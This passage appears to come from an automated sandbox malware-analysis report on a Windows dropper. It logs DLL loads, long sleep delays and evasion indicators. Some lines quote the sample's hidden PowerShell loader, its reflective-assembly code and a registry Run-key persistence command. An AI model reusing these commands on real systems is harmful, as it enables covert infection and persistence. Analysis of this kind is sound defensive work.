            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: rasapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: rasman.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: rtutils.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Torpernes.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Torpernes.exe Static file information: File size 1283968 > 1048576
            Source: Torpernes.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ore.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006D84000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match File source: 00000001.00000002.2181416185.0000000009DFB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nedtllingers $Prfabrikationernes $Frugtbarhedsguden), (gongs @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sanction = [AppDomain]::CurrentDomain.GetAssem
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($manubaliste)), $Celluloidensonnering).DefineDynamicModule($Bairnteam, $false).DefineType($Kobjlde, $Receptionschefer, [System.Multicas
            Source: C:\Users\user\Desktop\Torpernes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
            Source: C:\Users\user\Desktop\Torpernes.exe Code function: 0_2_00406183 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406183
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_3_001949CC push eax; iretd 6_3_001949CD
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB2890 push eax; retf 6_2_20CB2891
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB69A3 push 331320CBh; retf 6_2_20CB69B2
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6AC3 pushad ; retf 6_2_20CB6AC6
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6AE9 push 687F20CBh; retf 6_2_20CB6AEE
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6A89 push eax; retf 6_2_20CB6A8A
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6A8F push edx; retf 6_2_20CB6A92
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6A8D push eax; retf 6_2_20CB6A8E
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6A9B push esi; retf 6_2_20CB6A9E
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6A93 push esi; retf 6_2_20CB6A9A
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6AA1 push edi; retf 6_2_20CB6AA2
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB6A68 push 00000048h; retf 6_2_20CB6A6A
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB1FBF push ds; retf 6_2_20CB1FC2
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Code function: 6_2_20CB2F00 pushad ; iretd 6_2_20CB2F01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Contentious.exe
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run crisscrossing
            Source: C:\Users\user\Desktop\Torpernes.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | API/Special instruction interceptor: Address: 2D88B49
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Memory allocated: 110000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Memory allocated: 20DE0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Memory allocated: 20990000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 599890
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 599771
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 599652
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 599534
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 599401
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 599281
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 599172
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 599062
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598947
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598837
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598680
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598562
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598453
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598343
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598234
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598117
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 598000
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 597890
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 597774
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 597656
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 597546
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 597434
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 597328
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 597219
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 597101
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596984
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596875
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596765
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596656
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596546
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596437
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596327
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596219
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 596102
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 595984
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 595872
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 595764
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 595655
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 595522
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 595348
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 595219
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 595075
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 594968
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 594859
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 594750
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 594640
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 594531
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 594421
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 594233
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Thread delayed: delay time: 594125
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6149
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3468
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Window / User API: threadDelayed 3788
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Window / User API: threadDelayed 6044
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | API coverage: 2.0 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604 | Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -25825441703193356s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7192 | Thread sleep count: 3788 > 30
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -599890s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7192 | Thread sleep count: 6044 > 30
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -599771s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -599652s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -599534s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -599401s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -599281s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -599172s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -599062s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598947s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598837s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598680s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598562s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598453s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598343s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598234s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598117s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -598000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -597890s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -597774s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -597656s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -597546s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -597434s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -597328s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -597219s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -597101s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596984s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596875s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596765s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596656s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596546s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596437s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596327s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596219s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -596102s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -595984s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -595872s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -595764s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -595655s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -595522s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -595348s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -595219s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -595075s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -594968s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -594859s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -594750s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -594640s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -594531s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -594421s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -594233s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180 | Thread sleep time: -594125s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\Torpernes.exe | Code function: 0_2_0040615C FindFirstFileW,FindClose,0_2_0040615C
            Source: C:\Users\user\Desktop\Torpernes.exe | Code function: 0_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004056A1
            Source: C:\Users\user\Desktop\Torpernes.exe | Code function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_0040615C FindFirstFileW,FindClose,6_2_0040615C
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_00402770 FindFirstFileW,6_2_00402770
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_004056A1
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
            Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dcad4b8239f5aa<
            Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Torpernes.exe | API call chain: ExitProcess graph end node graph_0-3507
            Source: C:\Users\user\Desktop\Torpernes.exe | API call chain: ExitProcess graph end node graph_0-3506
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Code function: 6_2_00403B4F SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,SendMessageW,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongW,SendMessageW,GetDlgItem,ShowWindow,EnableWindow,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageW,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,6_2_00403B4F
            Source: C:\Users\user\Desktop\Torpernes.exe | Code function: 0_2_00406183 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406183
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Contentious.exe base: 1720000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Contentious.exe base: 19FFF4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "crisscrossing" /t reg_expand_sz /d "%isomerous% -windowstyle minimized $livsopsving=(get-itemproperty -path 'hkcu:\deponeringspladsen\').sknhedsplejes;%isomerous% ($livsopsving)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
